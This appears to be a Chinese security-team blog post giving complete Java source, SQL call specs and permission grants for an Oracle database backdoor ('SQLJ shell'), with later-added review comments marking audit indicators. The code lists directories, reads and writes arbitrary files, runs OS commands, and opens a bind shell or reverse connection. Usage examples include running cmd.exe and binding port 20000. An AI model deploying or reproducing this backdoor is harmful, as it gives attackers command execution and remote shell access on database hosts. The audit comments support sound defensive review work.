
ORACLE(SQLJ-SHELL)


信息来源: I.S.T.O信息安全团队(http://blog.csdn.net/I_S_T_O)

author : kj021320
team: I.S.T.O

首先在ORACLE数据库建立JAVA对象, 这个版本的SQLJ-SHELL 只能支持正向连接,反向连接的时候有BUG 不建议使用,不知道是ORA支持JAVA的问题还是个人能力有限...要是有更好的方法可以方便交流QQ:282720807

create or replace and compile java source named isto as
import java.io.*;
import java.net.*;
public class ISTO{
  //author: kj021320
  //team: I.S.T.O
 /**
  * Lists the entries of {@code path}, each followed by the literal text "/r/n" (as written
  * here: a forward-slash sequence, not a CRLF). Returns "" when {@code path} is not a
  * readable directory, because {@link File#list()} then yields null and the loop is skipped.
  *
  * NOTE(review): exposed to SQL as ISTO_LISTFOLDER. Combined with the all-files
  * FilePermission grant below, it lets any session that may call the function enumerate the
  * host filesystem; the call spec name and that grant are the things to look for when
  * auditing a database for this code.
  */
 public static String listFolder(String path){
  File f=null;
  String str="";
  f=new File(path);
  String[] files=f.list();   // null (not an exception) when path is not a listable directory
    if(files!=null)
  for(int i=0;i<files.length;i++){
   str+=files[i]+"/r/n";
  }
  return str;
 }
  /**
   * Creates or truncates {@code filepath} and writes {@code value} encoded with the JVM
   * default charset; returns "OK" on success. Any exception is swallowed and its message is
   * returned as the result instead, so the SQL caller never sees an error.
   *
   * NOTE(review): an unrestricted file-write primitive reachable from SQL (ISTO_SAVEFILE);
   * no path validation of any kind. The all-files FilePermission "write" grant below is what
   * makes it work, and the example at the end of the page uses it to drop a file under /tmp.
   */
  public static String saveFile(String filepath,String value){
  FileOutputStream fos=null;
  try {
   fos=new FileOutputStream(filepath);
   fos.write(value.getBytes());   // default-charset encoding; no charset parameter here
   return "OK";
  } catch (Exception e) {
   return e.getMessage();
  } finally{
   if(fos!=null){
    try {fos.close();} catch (Exception e) {}
   }
  }
 }
  /**
   * Reads {@code pathfile} decoded with charset name {@code code} and returns its lines
   * concatenated with no separator (readLine strips the line terminator and nothing is
   * re-added). On any failure — missing file, unsupported charset name, permission error —
   * the exception message is returned in place of the content.
   *
   * NOTE(review): unrestricted file read from SQL (ISTO_READFILE); relies on the all-files
   * FilePermission "read" grant below.
   */
  public static String readFile(String pathfile,String code){
  BufferedReader br=null;
  String value="";
  try {
   br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile),code));
   String s=null;
   while((s=br.readLine())!=null){
    value+=s;   // lines are joined back-to-back; original line breaks are lost
   }
   return value;
  } catch (Exception e) {
   return e.getMessage();
  } finally{
   if(br!=null){try {br.close();} catch (IOException e) {}}
  }
 }
  /**
   * Runs {@code filepath} as an OS command through {@link Runtime#exec(String)} (the
   * single-string form, which the runtime tokenizes itself), reads the child's stdout decoded
   * as {@code code} until EOF and returns it. Any exception's message is returned instead.
   *
   * NOTE(review): this is arbitrary OS command execution from inside the database JVM, with
   * whatever OS identity that JVM runs under; reachable from SQL as ISTO_EXECFILE and enabled
   * by the FilePermission "execute" grant below. Stderr is never read and waitFor() is never
   * called, so a child that fills its stderr pipe may stall this call — not verified here.
   */
  public static String execFile(String filepath,String code){
     int i=0;
     Runtime rt=Runtime.getRuntime();
     String output="";
     InputStreamReader isr = null;
     char[] bufferC=new char[1024];
     try{
      Process ps=rt.exec(filepath);
         isr=new InputStreamReader(ps.getInputStream(),code);   // stdout only
         while((i=isr.read(bufferC,0,bufferC.length))!=-1){
          output+=new String(bufferC,0,i);
         }
         return output;
     }catch(Exception e){
      return e.getMessage();
     }finally{
         if(isr!=null)try {isr.close();} catch (IOException e) {}
     }
 }
  /**
   * Opens a listening socket on {@code port}, blocks until exactly one client connects,
   * hands both sockets to an {@link optShell} thread and returns "OK". The SQL statement
   * that invoked it therefore does not return until a client has connected. If the
   * ServerSocket cannot be created or accept() fails, the exception message is returned and
   * {@code ss} is left open — it is only closed by optShell's run() on the success path.
   *
   * NOTE(review): bind-shell entry point (ISTO_BINDSHELL). Host-side indicators: the database
   * server process listening on an unexpected port, and the SocketPermission "*:*"
   * accept/listen grant below in the Java policy.
   */
  public static String bindShell(int port){
  ServerSocket ss=null;
  Socket s=null;
  try {
   ss = new ServerSocket(port);
   s=ss.accept();   // blocks the calling SQL session until a client connects
   new optShell(ss,s).start();

   return "OK";
  } catch (Exception e) {
   return e.getMessage();   // ss is not closed on this path
  }
 }
  /**
   * Connects out to {@code host}:{@code port} and hands the socket to an {@link optShell}
   * thread with no ServerSocket (so {@code ss} is null inside the thread); returns "OK" or
   * the exception message. The page text above states this mode is buggy and not
   * recommended, and no SQL call spec is declared for it in the function list below.
   *
   * NOTE(review): outbound connection initiated by the database JVM; egress filtering from
   * the database host is the mitigation, and the SocketPermission "connect" grant below is
   * what allows it.
   */
  public static String reverseShell(String host,int port){
  Socket s=null;
  try{
   s=new Socket(host,port);
   new optShell(null,s).start();
   return "OK";
  }catch(Exception e){
   return e.getMessage();
  }
 }
 /**
  * Interactive command loop run on its own thread over a connected socket. It reads one line
  * at a time, takes the first four characters of the trimmed line as the command (list, save,
  * read, exec), prompts for each argument on a separate line, and writes the result of the
  * matching static method back to the peer. Any other input gets the help text; the literal
  * line "exit" ends the loop. All socket writes use the JVM default charset.
  *
  * NOTE(review): prompt and help strings contain the literal text "/r/n" (as written), not a
  * CRLF. A peer disconnect makes readLine() return null, which is then dereferenced in
  * run(); the resulting exception is caught, printed, and the finally block closes the
  * socket and (if present) the listening ServerSocket, so one connection ends the shell.
  */
 public static class optShell extends Thread{
  OutputStream os=null;
  InputStream is=null;
    ServerSocket ss;   // null for the reverse-connect case
    Socket s;
  // Captures both socket streams. If obtaining them fails, everything is closed here but the
  // thread is still started by the caller with is == null; run() then fails on its first line
  // (the InputStreamReader constructor rejects a null stream) and its finally block runs again.
  public optShell(ServerSocket ss,Socket s){
   this.ss=ss;
      this.s=s;
      try{
        this.is=s.getInputStream();
        this.os=s.getOutputStream();
      }catch(Exception e){
       if(os!=null)try {os.close();} catch(Exception ex) {}
    if(is!=null)try {is.close();} catch(Exception ex) {}
        if(s!=null)try {s.close();} catch(Exception ex) {}
        if(ss!=null)try {ss.close();} catch(Exception ex) {}
      }
  }
  public void run(){
   BufferedReader br=new BufferedReader(new InputStreamReader(is));
   String line="";
   String cmdhelp="Command:/r/nlist /r/nsave/r/nread/r/nexec/r/nexit/r/n";
   try {
        //os.write(cmdhelp.getBytes());
    line=br.readLine();
    while(!"exit".equals(line)){
     // length is checked before trim(); a line of 4+ chars that trims to fewer than 4
     // makes substring() throw, which is caught below and ends the session
     if(line.length()>3){
      StringBuffer sb=new StringBuffer(line.trim());
      String cmd=sb.substring(0, 4);
      if(cmd.equals("list")){
       os.write("input you path:/r/n".getBytes());
       line=br.readLine();
       os.write(listFolder(line).getBytes());
      }else if("save".equals(cmd)){
       os.write("input you filepath:/r/n".getBytes());
       line=br.readLine();
       os.write("input you value:/r/n".getBytes());
       os.write(saveFile(line,br.readLine()).getBytes());   // value is a single line only
      }else if("read".equals(cmd)){
       os.write("input you filepath:/r/n".getBytes());
       line=br.readLine();
       os.write("input you code examle:GBK/r/n".getBytes());
       os.write(readFile(line,br.readLine()).getBytes());
      }else if("exec".equals(cmd)){
       os.write("input you run filepath:/r/n".getBytes());
       line=br.readLine();
       os.write("input you code examle:GBK/r/n".getBytes());
       os.write(execFile(line,br.readLine()).getBytes());
      }else{
       os.write(cmdhelp.getBytes());
      }
     }else{
      os.write(cmdhelp.getBytes());
     }
     line=br.readLine();
    }
   } catch (Exception e) {
    e.printStackTrace();   // where this lands depends on the hosting JVM's stderr
   }finally{
    if(os!=null)try {os.close();} catch(Exception e) {}
    if(is!=null)try {is.close();} catch(Exception e) {}
        if(s!=null)try {s.close();} catch(Exception e) {}
        if(ss!=null)try {ss.close();} catch(Exception e) {}   // listener closes too: one session per bindShell call
   }
  }
 }

以上建立完成之后 需要用ORACLE的函数调用JAVA的静态方法

-- NOTE(review): these call specs are the SQL-visible surface of the Java class above. The
-- ISTO_* names (or any CREATE FUNCTION ... AS LANGUAGE JAVA wrapping File, Runtime or Socket
-- APIs) are what a schema review should flag, together with the Dbms_Java grants below.
-- Directory listing function
create or replace function ISTO_LISTFOLDER(str varchar2) return varchar2
as language java name 'ISTO.listFolder(java.lang.String) return java.lang.String';
-- Save-file function
create or replace function ISTO_SAVEFILE(p varchar2,v varchar2) return varchar2
as language java name 'ISTO.saveFile(java.lang.String,java.lang.String) return java.lang.String';
-- Read-file function
create or replace function ISTO_READFILE(p varchar2,c varchar2) return varchar2
as language java name 'ISTO.readFile(java.lang.String,java.lang.String) return java.lang.String';
-- Run-file (command execution) function
create or replace function ISTO_EXECFILE(fp varchar2,c varchar2) return varchar2
as language java name 'ISTO.execFile(java.lang.String,java.lang.String) return java.lang.String';
-- Port bind; you can telnet in afterwards (blocks the calling session until a client connects)
create or replace function ISTO_BINDSHELL(port number) return varchar2
as language java name 'ISTO.bindShell(int) return java.lang.String';

以上函数转换操作之后 需要给JAVA授予访问权限

begin
-- NOTE(review): these three grants are what make the Java code above usable at all:
-- read/write/execute/delete on every file, writeFileDescriptor, and accept/connect/listen
-- on any host and port. They are also the most durable indicator of this shell — the Java
-- source and call specs can be renamed, but grants of this breadth to an ordinary user are
-- unusual and should be reviewed and revoked during an audit. '用户名字' is a placeholder
-- for the grantee's user name.
Dbms_Java.Grant_Permission('用户名字','java.io.FilePermission','<<ALL FILES>>','read,write,execute,delete');
Dbms_Java.Grant_Permission('用户名字','java.lang.RuntimePermission','*','writeFileDescriptor');
Dbms_Java.grant_permission('用户名字','java.net.SocketPermission','*:*','accept,connect,listen,resolve');
end;

然后就可以进行文件操作以及 运行程序  开启网络!

以下为测试代码

-- Usage examples as given on the page, one per call spec. In a database audit trail these
-- statements (SELECT of a user-defined Java call spec FROM DUAL) are the runtime footprint of
-- the shell; the call specs and grants above are the persistent one. ISTO_BINDSHELL blocks the
-- issuing session until a client connects (see bindShell).
SELECT ISTO_LISTFOLDER('/usr') FROM DUAL
SELECT ISTO_EXECFILE('C:/WINDOWS/system32/cmd.exe /c dir c:/','GBK') FROM DUAL;
SELECT ISTO_READFILE('/tmp/1.txt','GBK') FROM DUAL;
SELECT ISTO_SAVEFILE('/tmp/1.txt','一句话shell') FROM DUAL;
SELECT ISTO_BINDSHELL(20000) FROM DUAL

演示动画:http://www.isto.cn/vedio/ora-sqljshell.rar

 
